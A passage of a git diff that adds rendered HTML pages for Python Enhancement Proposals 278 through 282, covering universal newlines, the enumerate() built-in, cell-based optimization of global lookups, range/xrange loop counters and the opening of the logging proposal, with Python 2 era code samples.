Universal newline files should work fine with iterators and +xreadlines() as these eventually call the normal file +readline/readlines methods.

+

While universal newlines are automatically enabled for import they +are not for opening, where you have to specifically say open(..., +"U"). This is open to debate, but here are a few reasons for this +design:

+
    +
  • Compatibility. Programs which already do their own +interpretation of \r\n in text files would break. Examples of such +programs would be editors which warn you when you open a file with +a different newline convention. If universal newlines was made the +default such an editor would silently convert your line endings to +the local convention on save. Programs which open binary files as +text files on Unix would also break (but it could be argued they +deserve it :-).
  • +
  • Interface clarity. Universal newlines are only supported for +input files, not for input/output files, as the semantics would +become muddy. Would you write Mac newlines if all reads so far +had encountered Mac newlines? But what if you then later read a +Unix newline?
  • +
+

The newlines attribute is included so that programs that really +care about the newline convention, such as text editors, can +examine what was in a file. They can then save (a copy of) the +file with the same newline convention (or, in case of a file with +mixed newlines, ask the user what to do, or output in platform +convention).

+

Feedback is explicitly solicited on one item in the reference +implementation: whether or not the universal newlines routines +should grab the global interpreter lock. Currently they do not, +but this could be considered living dangerously, as they may +modify fields in a FileObject. But as these routines are +replacements for fgets() and fread() as well it may be difficult +to decide whether or not the lock is held when the routine is +called. Moreover, the only danger is that if two threads read the +same FileObject at the same time an extraneous newline may be seen +or the newlines attribute may inadvertently be set to mixed. I +would argue that if you read the same FileObject in two threads +simultaneously you are asking for trouble anyway.

+

Note that no globally accessible pointers are manipulated in the +fgets() or fread() replacement routines, just some integer-valued +flags, so the chances of core dumps are zero (he said:-).

+

Universal newline support can be disabled during configure because it does +have a small performance penalty, and moreover the implementation has +not been tested on all conceivable platforms yet. It might also be silly +on some platforms (WinCE or Palm devices, for instance). If universal +newline support is not enabled then file objects do not have the newlines +attribute, so testing whether the current Python has it can be done with a +simple:

+
if hasattr(open, 'newlines'):
+   print 'We have universal newline support'
+
+
+

Note that this test uses the open() function rather than the file +type so that it won’t fail for versions of Python where the file +type was not available (the file type was added to the built-in +namespace in the same release as the universal newline feature was +added).

+

Additionally, note that this test fails again on Python versions +>= 2.5, when open() was made a function again and is not synonymous +with the file type anymore.

+
+
+

Reference Implementation

+

A reference implementation is available in SourceForge patch +#476814: https://bugs.python.org/issue476814

+
+
+

References

+

None.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0278.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0279/index.html b/pep-0279/index.html new file mode 100644 index 00000000000..11dca42abd0 --- /dev/null +++ b/pep-0279/index.html @@ -0,0 +1,305 @@ + PEP 279 – The enumerate() built-in function | peps.python.org +
+
+


+ + +
+
+
+

PEP 279 – The enumerate() built-in function

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP introduces a new built-in function, enumerate() to +simplify a commonly used looping idiom. It provides all iterable +collections with the same advantage that iteritems() affords to +dictionaries – a compact, readable, reliable index notation.

+
+
+

Rationale

+

Python 2.2 introduced the concept of an iterable interface as +proposed in PEP 234. The iter() factory function was provided +as common calling convention and deep changes were made to use +iterators as a unifying theme throughout Python. The unification +came in the form of establishing a common iterable interface for +mappings, sequences, and file objects.

+

Generators, as proposed in PEP 255, were introduced as a means +for making it easier to create iterators, especially ones with +complex internal execution or variable states. The availability +of generators makes it possible to improve on the loop counter +ideas in PEP 212. Those ideas provided a clean syntax for +iteration with indices and values, but did not apply to all +iterable objects. Also, that approach did not have the memory +friendly benefit provided by generators which do not evaluate the +entire sequence all at once.

+

The new proposal is to add a built-in function, enumerate() which +was made possible once iterators and generators became available. +It provides all iterables with the same advantage that iteritems() +affords to dictionaries – a compact, readable, reliable index +notation. Like zip(), it is expected to become a commonly used +looping idiom.

+

This suggestion is designed to take advantage of the existing +implementation and require little additional effort to +incorporate. It is backwards compatible and requires no new +keywords. The proposal will go into Python 2.3 when generators +become final and are not imported from __future__.

+
+
+

BDFL Pronouncements

+

The new built-in function is ACCEPTED.

+
+
+

Specification for a new built-in

+
def enumerate(collection):
+   'Generates an indexed series:  (0,coll[0]), (1,coll[1]) ...'
+   i = 0
+   it = iter(collection)
+   while 1:
+      yield (i, it.next())
+      i += 1
+
+
+
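The built-in, as eventually shipped, behaves like the generator above:

for i, season in enumerate(['Spring', 'Summer', 'Fall', 'Winter']):
    print(i, season)
# 0 Spring
# 1 Summer
# 2 Fall
# 3 Winter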

Note A: PEP 212 Loop Counter Iteration discussed several +proposals for achieving indexing. Some of the proposals only work +for lists unlike the above function which works for any generator, +xrange, sequence, or iterable object. Also, those proposals were +presented and evaluated in the world prior to Python 2.2 which did +not include generators. As a result, the non-generator version in +PEP 212 had the disadvantage of consuming memory with a giant list +of tuples. The generator version presented here is fast and +light, works with all iterables, and allows users to abandon the +sequence in mid-stream with no loss of computation effort.

+

There are other PEPs which touch on related issues: integer +iterators, integer for-loops, and one for modifying the arguments +to range and xrange. The enumerate() proposal does not preclude +the other proposals and it still meets an important need even if +those are adopted – the need to count items in any iterable. The +other proposals give a means of producing an index but not the +corresponding value. This is especially problematic if a sequence +is given which doesn’t support random access such as a file +object, generator, or sequence defined with __getitem__.
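For instance, enumerate() counts items from a source that supports neither len() nor random access, and the loop can be abandoned mid-stream:

def squares():
    # An unbounded generator: no __getitem__, no len().
    n = 0
    while True:
        yield n * n
        n += 1

for i, sq in enumerate(squares()):
    if i == 3:
        break    # abandon the sequence mid-stream, no wasted computation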

+

Note B: Almost all of the PEP reviewers welcomed the function but +were divided as to whether there should be any built-ins. The +main argument for a separate module was to slow the rate of +language inflation. The main argument for a built-in was that the +function is destined to be part of a core programming style, +applicable to any object with an iterable interface. Just as +zip() solves the problem of looping over multiple sequences, the +enumerate() function solves the loop counter problem.

+

If only one built-in is allowed, then enumerate() is the most +important general purpose tool, solving the broadest class of +problems while improving program brevity, clarity and reliability.

+

Note C: Various alternative names were discussed:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
iterindexed()   five syllables is a mouthful
index()         nice verb but could be confused with the .index() method
indexed()       widely liked however adjectives should be avoided
indexer()       noun did not read well in a for-loop
count()         direct and explicit but often used in other contexts
itercount()     direct, explicit and hated by more than one person
iteritems()     conflicts with key:value concept for dictionaries
itemize()       confusing because amap.items() != list(itemize(amap))
enum()          pithy; less clear than enumerate; too similar to enum in other languages where it has a different meaning
+

All of the names involving ‘count’ had the further disadvantage of +implying that the count would begin from one instead of zero.

+

All of the names involving ‘index’ clashed with usage in database +languages where indexing implies a sorting operation rather than +linear sequencing.

+

Note D: This function was originally proposed with optional start +and stop arguments. GvR pointed out that the function call +enumerate(seqn,4,6) had an alternate, plausible interpretation as +a slice that would return the fourth and fifth elements of the +sequence. To avoid the ambiguity, the optional arguments were +dropped even though it meant losing flexibility as a loop counter. +That flexibility was most important for the common case of +counting from one, as in:

+
for linenum, line in enumerate(source,1):  print linenum, line
+
+
+
+
Comments from GvR:
filter and map should die and be subsumed into list +comprehensions, not grow more variants. I’d rather introduce +built-ins that do iterator algebra (e.g. the iterzip that I’ve +often used as an example).

I like the idea of having some way to iterate over a sequence +and its index set in parallel. It’s fine for this to be a +built-in.

+

I don’t like the name “indexed”; adjectives do not make good +function names. Maybe iterindexed()?

+
+
Comments from Ka-Ping Yee:
I’m also quite happy with everything you +proposed … and the extra built-ins (really ‘indexed’ in +particular) are things I have wanted for a long time.
+
Comments from Neil Schemenauer:
The new built-ins sound okay. Guido +may be concerned with increasing the number of built-ins too +much. You might be better off selling them as part of a +module. If you use a module then you can add lots of useful +functions (Haskell has lots of them that we could steal).
+
Comments from Magnus Lie Hetland:
I think indexed would be a useful and +natural built-in function. I would certainly use it a lot. I +like indexed() a lot; +1. I’m quite happy to have it make PEP +281 obsolete. Adding a separate module for iterator utilities +seems like a good idea.
+
Comments from the Community:
The response to the enumerate() proposal +has been close to 100% favorable. Almost everyone loves the +idea.
+
Author response:
Prior to these comments, four built-ins were proposed. +After the comments, xmap, xfilter and xzip were withdrawn. The +one that remains is vital for the language and is proposed by +itself. Indexed() is trivially easy to implement and can be +documented in minutes. More importantly, it is useful in +everyday programming which does not otherwise involve explicit +use of generators.

This proposal originally included another function iterzip(). +That was subsequently implemented as the izip() function in +the itertools module.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0279.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0280/index.html b/pep-0280/index.html new file mode 100644 index 00000000000..f62b4c664a4 --- /dev/null +++ b/pep-0280/index.html @@ -0,0 +1,619 @@ + PEP 280 – Optimizing access to globals | peps.python.org +
+
+


+ + +
+
+
+

PEP 280 – Optimizing access to globals

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Deferral

+

While this PEP is a nice idea, no-one has yet emerged to do the work of +hashing out the differences between this PEP, PEP 266 and PEP 267. +Hence, it is being deferred.

+
+
+

Abstract

+

This PEP describes yet another approach to optimizing access to +module globals, providing an alternative to PEP 266 (Optimizing +Global Variable/Attribute Access by Skip Montanaro) and PEP 267 +(Optimized Access to Module Namespaces by Jeremy Hylton).

+

The expectation is that eventually one approach will be picked and +implemented; possibly multiple approaches will be prototyped +first.

+
+
+

Description

+

(Note: Jason Orendorff writes: “””I implemented this once, long +ago, for Python 1.5-ish, I believe. I got it to the point where +it was only 15% slower than ordinary Python, then abandoned it. +;) In my implementation, “cells” were real first-class objects, +and “celldict” was a copy-and-hack version of dictionary. I +forget how the rest worked.””” Reference: +https://mail.python.org/pipermail/python-dev/2002-February/019876.html)

+

Let a cell be a really simple Python object, containing a pointer +to a Python object and a pointer to a cell. Both pointers may be +NULL. A Python implementation could be:

+
class cell(object):
+
+    def __init__(self):
+        self.objptr = NULL
+        self.cellptr = NULL
+
+
+

The cellptr attribute is used for chaining cells together for +searching built-ins; this will be explained later.

+

Let a celldict be a mapping from strings (the names of a module’s +globals) to objects (the values of those globals), implemented +using a dict of cells. A Python implementation could be:

+
class celldict(object):
+
+    def __init__(self):
+        self.__dict = {} # dict of cells
+
+    def getcell(self, key):
+        c = self.__dict.get(key)
+        if c is None:
+            c = cell()
+            self.__dict[key] = c
+        return c
+
+    def cellkeys(self):
+        return self.__dict.keys()
+
+    def __getitem__(self, key):
+        c = self.__dict.get(key)
+        if c is None:
+            raise KeyError, key
+        value = c.objptr
+        if value is NULL:
+            raise KeyError, key
+        else:
+            return value
+
+    def __setitem__(self, key, value):
+        c = self.__dict.get(key)
+        if c is None:
+            c = cell()
+            self.__dict[key] = c
+        c.objptr = value
+
+    def __delitem__(self, key):
+        c = self.__dict.get(key)
+        if c is None or c.objptr is NULL:
+            raise KeyError, key
+        c.objptr = NULL
+
+    def keys(self):
+        return [k for k, c in self.__dict.iteritems()
+                if c.objptr is not NULL]
+
+    def items(self):
+        return [(k, c.objptr) for k, c in self.__dict.iteritems()
+                if c.objptr is not NULL]
+
+    def values(self):
+        return [c.objptr for c in self.__dict.itervalues()
+                if c.objptr is not NULL]
+
+    def clear(self):
+        for c in self.__dict.values():
+            c.objptr = NULL
+
+    # Etc.
+
+
+

It is possible that a cell exists corresponding to a given key, +but the cell’s objptr is NULL; let’s call such a cell empty. When +the celldict is used as a mapping, it is as if empty cells don’t +exist. However, once added, a cell is never deleted from a +celldict, and it is possible to get at empty cells using the +getcell() method.

+

The celldict implementation never uses the cellptr attribute of +cells.
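A quick sketch of these semantics, using the pseudo-code classes above (with the NULL sentinel bound to, say, None before they are executed):

NULL = None              # stand-in for the C NULL pointer of the pseudo-code

d = celldict()
d['x'] = 1
c = d.getcell('x')       # fetch the underlying cell
del d['x']               # empties the cell ...
assert c.objptr is NULL
assert c is d.getcell('x')   # ... but the cell survives and is reused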

+

We change the module implementation to use a celldict for its +__dict__. The module’s getattr, setattr and delattr operations +now map to getitem, setitem and delitem on the celldict. The type +of <module>.__dict__ and globals() is probably the only backwards +incompatibility.

+

When a module is initialized, its __builtins__ is initialized from +the __builtin__ module’s __dict__, which is itself a celldict. +For each cell in __builtins__, the new module’s __dict__ adds a +cell with a NULL objptr, whose cellptr points to the corresponding +cell of __builtins__. Python pseudo-code (ignoring rexec):

+
import __builtin__
+
+class module(object):
+
+    def __init__(self):
+        self.__dict__ = d = celldict()
+        d['__builtins__'] = bd = __builtin__.__dict__
+        for k in bd.cellkeys():
+            c = self.__dict__.getcell(k)
+            c.cellptr = bd.getcell(k)
+
+    def __getattr__(self, k):
+        try:
+            return self.__dict__[k]
+        except KeyError:
+            raise AttributeError, k
+
+    def __setattr__(self, k, v):
+        self.__dict__[k] = v
+
+    def __delattr__(self, k):
+        del self.__dict__[k]
+
+
+

The compiler generates LOAD_GLOBAL_CELL <i> (and STORE_GLOBAL_CELL +<i> etc.) opcodes for references to globals, where <i> is a small +index with meaning only within one code object like the const +index in LOAD_CONST. The code object has a new tuple, co_globals, +giving the names of the globals referenced by the code indexed by +<i>. No new analysis is required to be able to do this.

+

When a function object is created from a code object and a celldict, the function object creates an array of cell pointers by asking the celldict for cells corresponding to the names in the code object’s co_globals. If the celldict doesn’t already have a cell for a particular name, it creates an empty one. This array of cell pointers is stored on the function object as func_cells. When a function object is created from a regular dict instead of a celldict, func_cells is a NULL pointer.

+

When the VM executes a LOAD_GLOBAL_CELL <i> instruction, it gets +cell number <i> from func_cells. It then looks in the cell’s +PyObject pointer, and if not NULL, that’s the global value. If it +is NULL, it follows the cell’s cell pointer to the next cell, if it +is not NULL, and looks in the PyObject pointer in that cell. If +that’s also NULL, or if there is no second cell, NameError is +raised. (It could follow the chain of cell pointers until a NULL +cell pointer is found; but I have no use for this.) Similar for +STORE_GLOBAL_CELL <i>, except it doesn’t follow the cell pointer +chain – it always stores in the first cell.

+

There are fallbacks in the VM for the case where the function’s +globals aren’t a celldict, and hence func_cells is NULL. In that +case, the code object’s co_globals is indexed with <i> to find the +name of the corresponding global and this name is used to index the +function’s globals dict.

+
+
+

Additional Ideas

+
    +
  • Never make func_cell a NULL pointer; instead, make up an array +of empty cells, so that LOAD_GLOBAL_CELL can index func_cells +without a NULL check.
  • +
  • Make c.cellptr equal to c when a cell is created, so that +LOAD_GLOBAL_CELL can always dereference c.cellptr without a NULL +check.

    With these two additional ideas added, here’s Python pseudo-code +for LOAD_GLOBAL_CELL:

    +
    def LOAD_GLOBAL_CELL(self, i):
    +    # self is the frame
    +    c = self.func_cells[i]
    +    obj = c.objptr
    +    if obj is not NULL:
    +        return obj # Existing global
    +    return c.cellptr.objptr # Built-in or NULL
    +
    +
    +
  • +
  • Be more aggressive: put the actual values of builtins into module +dicts, not just pointers to cells containing the actual values.

    There are two points to this: (1) Simplify and speed access, which +is the most common operation. (2) Support faithful emulation of +extreme existing corner cases.

    +

    WRT #2, the set of builtins in the scheme above is captured at the +time a module dict is first created. Mutations to the set of builtin +names following that don’t get reflected in the module dicts. Example: +consider files main.py and cheater.py:

    +
    [main.py]
    +import cheater
    +def f():
    +    cheater.cheat()
    +    return pachinko()
    +print f()
    +
    +[cheater.py]
    +def cheat():
    +    import __builtin__
    +    __builtin__.pachinko = lambda: 666
    +
    +
    +

If main.py is run under Python 2.2 (or before), 666 is printed. But under the proposal, __builtin__.pachinko doesn’t exist at the time main’s __dict__ is initialized. When the function object for f is created, main.__dict__ grows a pachinko cell mapping to two NULLs. When cheat() is called, __builtin__.__dict__ grows a pachinko cell too, but main.__dict__ doesn’t know – and will never know – about that. When f’s return stmt references pachinko, it will still find the double-NULLs in main.__dict__’s pachinko cell, and so raise NameError.

    +

    A similar (in cause) break in compatibility can occur if a module +global foo is del’ed, but a builtin foo was created prior to that +but after the module dict was first created. Then the builtin foo +becomes visible in the module under 2.2 and before, but remains +invisible under the proposal.

    +

    Mutating builtins is extremely rare (most programs never mutate the +builtins, and it’s hard to imagine a plausible use for frequent +mutation of the builtins – I’ve never seen or heard of one), so it +doesn’t matter how expensive mutating the builtins becomes. OTOH, +referencing globals and builtins is very common. Combining those +observations suggests a more aggressive caching of builtins in module +globals, speeding access at the expense of making mutations of the +builtins (potentially much) more expensive to keep the caches in +synch.

    +

    Much of the scheme above remains the same, and most of the rest is +just a little different. A cell changes to:

    +
    class cell(object):
    +    def __init__(self, obj=NULL, builtin=0):
    +        self.objptr = obj
    +        self.builtinflag = builtin
    +
    +
    +

    and a celldict maps strings to this version of cells. builtinflag +is true when and only when objptr contains a value obtained from +the builtins; in other words, it’s true when and only when a cell +is acting as a cached value. When builtinflag is false, objptr is +the value of a module global (possibly NULL). celldict changes to:

    +
    class celldict(object):
    +
    +    def __init__(self, builtindict=()):
    +        self.basedict = builtindict
    +        self.__dict = d = {}
    +        for k, v in builtindict.items():
    +            d[k] = cell(v, 1)
    +
    +    def __getitem__(self, key):
    +        c = self.__dict.get(key)
    +        if c is None or c.objptr is NULL or c.builtinflag:
    +            raise KeyError, key
    +        return c.objptr
    +
    +    def __setitem__(self, key, value):
    +        c = self.__dict.get(key)
    +        if c is None:
    +            c = cell()
    +            self.__dict[key] = c
    +        c.objptr = value
    +        c.builtinflag = 0
    +
    +    def __delitem__(self, key):
    +        c = self.__dict.get(key)
    +        if c is None or c.objptr is NULL or c.builtinflag:
    +            raise KeyError, key
    +        c.objptr = NULL
    +        # We may have unmasked a builtin.  Note that because
    +        # we're checking the builtin dict for that *now*, this
    +        # still works if the builtin first came into existence
    +        # after we were constructed.  Note too that del on
    +        # namespace dicts is rare, so the expense of this check
    +        # shouldn't matter.
    +        if key in self.basedict:
    +            c.objptr = self.basedict[key]
    +            assert c.objptr is not NULL # else "in" lied
    +            c.builtinflag = 1
    +        else:
    +            # There is no builtin with the same name.
    +            assert not c.builtinflag
    +
    +    def keys(self):
    +        return [k for k, c in self.__dict.iteritems()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def items(self):
    +        return [(k, c.objptr) for k, c in self.__dict.iteritems()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def values(self):
    +        return [c.objptr for c in self.__dict.itervalues()
    +                if c.objptr is not NULL and not c.builtinflag]
    +
    +    def clear(self):
    +        for c in self.__dict.values():
    +            if not c.builtinflag:
    +                c.objptr = NULL
    +
    +    # Etc.
    +
    +
    +

    The speed benefit comes from simplifying LOAD_GLOBAL_CELL, which +I expect is executed more frequently than all other namespace +operations combined:

    +
    def LOAD_GLOBAL_CELL(self, i):
    +    # self is the frame
    +    c = self.func_cells[i]
    +    return c.objptr   # may be NULL (also true before)
    +
    +
    +

    That is, accessing builtins and accessing module globals are equally +fast. For module globals, a NULL-pointer test+branch is saved. For +builtins, an additional pointer chase is also saved.

    +

    The other part needed to make this fly is expensive, propagating +mutations of builtins into the module dicts that were initialized +from the builtins. This is much like, in 2.2, propagating changes +in new-style base classes to their descendants: the builtins need to +maintain a list of weakrefs to the modules (or module dicts) +initialized from the builtin’s dict. Given a mutation to the builtin +dict (adding a new key, changing the value associated with an +existing key, or deleting a key), traverse the list of module dicts +and make corresponding mutations to them. This is straightforward; +for example, if a key is deleted from builtins, execute +reflect_bltin_del in each module:

    +
    def reflect_bltin_del(self, key):
    +    c = self.__dict.get(key)
    +    assert c is not None # else we were already out of synch
    +    if c.builtinflag:
    +        # Put us back in synch.
    +        c.objptr = NULL
    +        c.builtinflag = 0
    +    # Else we're shadowing the builtin, so don't care that
    +    # the builtin went away.
    +
    +
    +

    Note that c.builtinflag protects us from erroneously deleting a +module global of the same name. Adding a new (key, value) builtin +pair is similar:

    +
    def reflect_bltin_new(self, key, value):
    +    c = self.__dict.get(key)
    +    if c is None:
    +        # Never heard of it before:  cache the builtin value.
    +        self.__dict[key] = cell(value, 1)
    +    elif c.objptr is NULL:
    +        # This used to exist in the module or the builtins,
    +        # but doesn't anymore; rehabilitate it.
    +        assert not c.builtinflag
    +        c.objptr = value
    +        c.builtinflag = 1
    +    else:
    +        # We're shadowing it already.
    +        assert not c.builtinflag
    +
    +
    +

    Changing the value of an existing builtin:

    +
    def reflect_bltin_change(self, key, newvalue):
    +    c = self.__dict.get(key)
    +    assert c is not None # else we were already out of synch
    +    if c.builtinflag:
    +        # Put us back in synch.
    +        c.objptr = newvalue
    +    # Else we're shadowing the builtin, so don't care that
    +    # the builtin changed.
    +
    +
    +
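    To make the registry concrete, here is a minimal sketch of the builtin-side bookkeeping described above; the builtindict class, its register() method and the weakref list are assumptions, not part of the proposal. reflect_bltin_new and reflect_bltin_change would be driven from __setitem__ in the same way:

    +
    import weakref
    +
    +class builtindict(dict):
    +    def __init__(self, *args, **kwargs):
    +        dict.__init__(self, *args, **kwargs)
    +        self.registry = []   # weakrefs to celldicts built from us
    +
    +    def register(self, celldict):
    +        self.registry.append(weakref.ref(celldict))
    +
    +    def __delitem__(self, key):
    +        dict.__delitem__(self, key)
    +        # Propagate the deletion to every still-live module dict.
    +        for ref in self.registry:
    +            d = ref()
    +            if d is not None:
    +                d.reflect_bltin_del(key)
    +
    +
    +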
  • +
+
+
+

FAQs

+
    +
  • Q: Will it still be possible to:

    a) install new builtins in the __builtin__ namespace and have +them available in all already loaded modules right away?

    +

    b) override builtins (e.g. open()) with my own copies +(e.g. to increase security) in a way that makes these new +copies override the previous ones in all modules?

    +

    A: Yes, this is the whole point of this design. In the original +approach, when LOAD_GLOBAL_CELL finds a NULL in the second +cell, it should go back to see if the __builtins__ dict has +been modified (the pseudo code doesn’t have this yet). Tim’s +“more aggressive” alternative also takes care of this.

    +
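    As a hedged sketch, that re-check could be bolted onto the end of the earlier pseudo-code; the recheck_builtins helper is hypothetical:

    +
    def LOAD_GLOBAL_CELL(self, i):
    +    c = self.func_cells[i]
    +    obj = c.objptr
    +    if obj is not NULL:
    +        return obj                  # module global
    +    obj = c.cellptr.objptr
    +    if obj is not NULL:
    +        return obj                  # builtin known at module creation
    +    # Hypothetical slow path: re-consult __builtins__ in case it
    +    # was mutated after the module's cells were created.
    +    return self.recheck_builtins(i)
    +
    +
    +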
  • +
  • Q: How does the new scheme get along with the restricted execution +model?

    A: It is intended to support that fully.

    +
  • +
  • Q: What happens when a global is deleted?

    A: The module’s celldict would have a cell with a NULL objptr for +that key. This is true in both variations, but the “aggressive” +variation goes on to see whether this unmasks a builtin of the +same name, and if so copies its value (just a pointer-copy of the +ultimate PyObject*) into the cell’s objptr and sets the cell’s +builtinflag to true.

    +
  • +
  • Q: What would the C code for LOAD_GLOBAL_CELL look like?

    A: The first version, with the first two bullets under “Additional +ideas” incorporated, could look like this:

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->objptr;
    +    if (x == NULL) {
    +        x = cell->cellptr->objptr;
    +        if (x == NULL) {
    +            ... error recovery ...
    +            break;
    +        }
    +    }
    +    Py_INCREF(x);
    +    PUSH(x);
    +    continue;
    +
    +
    +

    We could even write it like this (idea courtesy of Ka-Ping Yee):

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->cellptr->objptr;
    +    if (x != NULL) {
    +        Py_INCREF(x);
    +        PUSH(x);
    +        continue;
    +    }
    +    ... error recovery ...
    +    break;
    +
    +
    +

    In modern CPU architectures, this reduces the number of +branches taken for built-ins, which might be a really good +thing, while any decent memory cache should realize that +cell->cellptr is the same as cell for regular globals and hence +this should be very fast in that case too.

    +

    For the aggressive variant:

    +
    case LOAD_GLOBAL_CELL:
    +    cell = func_cells[oparg];
    +    x = cell->objptr;
    +    if (x != NULL) {
    +        Py_INCREF(x);
    +        PUSH(x);
    +        continue;
    +    }
    +    ... error recovery ...
    +    break;
    +
    +
    +
  • +
  • Q: What happens in the module’s top-level code where there is +presumably no func_cells array?

    A: We could do some code analysis and create a func_cells array, +or we could use LOAD_NAME which should use PyMapping_GetItem on +the globals dict.

    +
  • +
+
+
+

Graphics

+

Ka-Ping Yee supplied a drawing of the state of things after +“import spam”, where spam.py contains:

+
import eggs
+
+i = -2
+max = 3
+
+def foo(n):
+    y = abs(i) + max
+    return eggs.ham(y + n)
+
+
+

The drawing is at http://web.lfw.org/repo/cells.gif; a larger +version is at http://lfw.org/repo/cells-big.gif; the source is at +http://lfw.org/repo/cells.ai.

+
+
+

Comparison

+

XXX Here, a comparison of the three approaches could be added.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0280.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0281/index.html new file mode 100644 index 00000000000..3b55c9bc75e --- /dev/null +++ b/pep-0281/index.html @@ -0,0 +1,251 @@ + PEP 281 – Loop Counter Iteration with range and xrange | peps.python.org +
+
+


+ + +
+
+
+

PEP 281 – Loop Counter Iteration with range and xrange

+
+
Author:
+
Magnus Lie Hetland <magnus at hetland.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP describes yet another way of exposing the loop counter in +for-loops. It basically proposes that the functionality of the +function indices() from PEP 212 be included in the existing +functions range() and xrange().

+
+
+

Pronouncement

+

In commenting on PEP 279’s enumerate() function, this PEP’s author +offered, “I’m quite happy to have it make PEP 281 obsolete.” +Subsequently, PEP 279 was accepted into Python 2.3.

+

On 17 June 2005, the BDFL concurred with it being obsolete and +hereby rejected the PEP. For the record, he found some of the +examples to be somewhat jarring in appearance:

+
>>> range(range(5), range(10), range(2))
+[5, 7, 9]
+
+
+
+
+

Motivation

+

It is often desirable to loop over the indices of a sequence. PEP +212 describes several ways of doing this, including adding a +built-in function called indices, conceptually defined as:

+
def indices(sequence):
+    return range(len(sequence))
+
+
+

On the assumption that adding functionality to an existing built-in +function may be less intrusive than adding a new built-in function, +this PEP proposes adding this functionality to the existing +functions range() and xrange().

+
+
+

Specification

+

It is proposed that all three arguments to the built-in functions +range() and xrange() are allowed to be objects with a length +(i.e. objects implementing the __len__ method). If an argument +cannot be interpreted as an integer (i.e. it has no __int__ +method), its length will be used instead.

+

Examples:

+
>>> range(range(10))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> range(range(5), range(10))
+[5, 6, 7, 8, 9]
+>>> range(range(5), range(10), range(2))
+[5, 7, 9]
+>>> list(xrange(range(10)))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> list(xrange(xrange(10)))
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+
+# Number the lines of a file:
+lines = file.readlines()
+for num in range(lines):
+    print num, lines[num]
+
+
+
+
+

Alternatives

+

A natural alternative to the above specification is allowing +xrange() to access its arguments in a lazy manner. Thus, instead +of using their length explicitly, xrange can return one index for +each element of the stop argument until the end is reached. A +similar lazy treatment makes little sense for the start and step +arguments since their length must be calculated before iteration +can begin. (Actually, the length of the step argument isn’t needed +until the second element is returned.)

+

A pseudo-implementation (using only the stop argument, and assuming +that it is iterable) is:

+
def xrange(stop):
+    i = 0
+    for x in stop:
+        yield i
+        i += 1
+
+
+

Testing whether to use int() or lazy iteration could be done by +checking for an __iter__ attribute. (This example assumes the +presence of generators, but could easily have been implemented as a +plain iterator object.)

+
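A hedged sketch of that dispatch, wrapping the original built-in (Python 2 era):

+
import __builtin__
+
+def xrange(stop):
+    # Lazy iteration when 'stop' is iterable, int() conversion otherwise.
+    if hasattr(stop, '__iter__'):
+        def indices():
+            i = 0
+            for x in stop:
+                yield i
+                i += 1
+        return indices()
+    return __builtin__.xrange(int(stop))
+
+
+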

It may be questionable whether this feature is truly useful, since +one would not be able to access the elements of the iterable object +inside the for loop through indexing.

+

Example:

+
# Printing the numbers of the lines of a file:
+for num in range(file):
+    print num # The line itself is not accessible
+
+
+

A more controversial alternative (to deal with this) would be to +let range() behave like the function irange() of PEP 212 when +supplied with a sequence.

+

Example:

+
>>> range(5)
+[0, 1, 2, 3, 4]
+>>> range('abcde')
+[(0, 'a'), (1, 'b'), (2, 'c'), (3, 'd'), (4, 'e')]
+
+
+
+
+

Backwards Compatibility

+

The proposal could cause backwards incompatibilities if arguments +are used which implement both __int__ and __len__ (or __iter__ in +the case of lazy iteration with xrange). The author does not +believe that this is a significant problem.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0281.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0282/index.html new file mode 100644 index 00000000000..c1dc6da0a0c --- /dev/null +++ b/pep-0282/index.html @@ -0,0 +1,742 @@ + PEP 282 – A Logging System | peps.python.org +
+
+


+ + +
+
+
+

PEP 282 – A Logging System

+
+
Author:
+
Vinay Sajip <vinay_sajip at red-dove.com>, +Trent Mick <trentm at activestate.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP describes a proposed logging package for Python’s +standard library.

+

Basically the system involves the user creating one or more logger +objects on which methods are called to log debugging notes, +general information, warnings, errors etc. Different logging +‘levels’ can be used to distinguish important messages from less +important ones.

+

A registry of named singleton logger objects is maintained so that

+
    +
  1. different logical logging streams (or ‘channels’) exist +(say, one for ‘zope.zodb’ stuff and another for +‘mywebsite’-specific stuff)
  2. +
  3. one does not have to pass logger object references around.
  4. +
+

The system is configurable at runtime. This configuration +mechanism allows one to tune the level and type of logging done +while not touching the application itself.

+
+
+

Motivation

+

If a single logging mechanism is enshrined in the standard +library, 1) logging is more likely to be done ‘well’, and 2) +multiple libraries will be able to be integrated into larger +applications which can be logged reasonably coherently.

+
+
+

Influences

+

This proposal was put together after having studied the +following logging packages:

+
    +
